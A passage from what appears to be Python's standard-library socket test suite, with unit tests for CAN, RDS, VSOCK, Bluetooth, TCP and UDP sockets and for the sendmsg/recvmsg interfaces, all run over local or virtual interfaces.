def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_CAN_J1939, 'CAN J1939 required for this test.')
class J1939Test(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
@unittest.skipUnless(hasattr(socket, "CAN_J1939"),
'socket.CAN_J1939 required for this test.')
def testJ1939Constants(self):
socket.CAN_J1939
socket.J1939_MAX_UNICAST_ADDR
socket.J1939_IDLE_ADDR
socket.J1939_NO_ADDR
socket.J1939_NO_NAME
socket.J1939_PGN_REQUEST
socket.J1939_PGN_ADDRESS_CLAIMED
socket.J1939_PGN_ADDRESS_COMMANDED
socket.J1939_PGN_PDU1_MAX
socket.J1939_PGN_MAX
socket.J1939_NO_PGN
# J1939 socket options
socket.SO_J1939_FILTER
socket.SO_J1939_PROMISC
socket.SO_J1939_SEND_PRIO
socket.SO_J1939_ERRQUEUE
socket.SCM_J1939_DEST_ADDR
socket.SCM_J1939_DEST_NAME
socket.SCM_J1939_PRIO
socket.SCM_J1939_ERRQUEUE
socket.J1939_NLA_PAD
socket.J1939_NLA_BYTES_ACKED
socket.J1939_EE_INFO_NONE
socket.J1939_EE_INFO_TX_ABORT
socket.J1939_FILTER_MAX
@unittest.skipUnless(hasattr(socket, "CAN_J1939"),
'socket.CAN_J1939 required for this test.')
def testCreateJ1939Socket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_J1939) as s:
pass
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_J1939) as s:
addr = self.interface, socket.J1939_NO_NAME, socket.J1939_NO_PGN, socket.J1939_NO_ADDR
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_QIPCRTR,
'QIPCRTR sockets required for this test.')
class BasicQIPCRTRTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_QIPCRTR
def testCreateSocket(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
pass
def testUnbound(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertEqual(s.getsockname()[1], 0)
def testBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
socket_helper.bind_port(s, host=s.getsockname()[0])
self.assertNotEqual(s.getsockname()[1], 0)
def testInvalidBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertRaises(OSError, socket_helper.bind_port, s, host=-2)
def testAutoBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
s.connect((123, 123))
self.assertNotEqual(s.getsockname()[1], 0)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
@unittest.skipUnless(HAVE_SOCKET_BLUETOOTH,
'Bluetooth sockets required for this test.')
class BasicBluetoothTest(unittest.TestCase):
def testBluetoothConstants(self):
socket.BDADDR_ANY
socket.BDADDR_LOCAL
socket.AF_BLUETOOTH
socket.BTPROTO_RFCOMM
if sys.platform != "win32":
socket.BTPROTO_HCI
socket.SOL_HCI
socket.BTPROTO_L2CAP
if not sys.platform.startswith("freebsd"):
socket.BTPROTO_SCO
def testCreateRfcommSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM) as s:
pass
@unittest.skipIf(sys.platform == "win32", "windows does not support L2CAP sockets")
def testCreateL2capSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_SEQPACKET, socket.BTPROTO_L2CAP) as s:
pass
@unittest.skipIf(sys.platform == "win32", "windows does not support HCI sockets")
def testCreateHciSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_RAW, socket.BTPROTO_HCI) as s:
pass
@unittest.skipIf(sys.platform == "win32" or sys.platform.startswith("freebsd"),
"windows and freebsd do not support SCO sockets")
def testCreateScoSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_SEQPACKET, socket.BTPROTO_SCO) as s:
pass
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class BasicUDPLITETest(ThreadedUDPLITESocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPLITESocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDPLITE
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDPLITE
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = support.LOOPBACK_TIMEOUT
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
while True:
self.sendmsgToServer([b"a"*512])
except TimeoutError:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
# bpo-33937 the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("TimeoutError not raised")
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
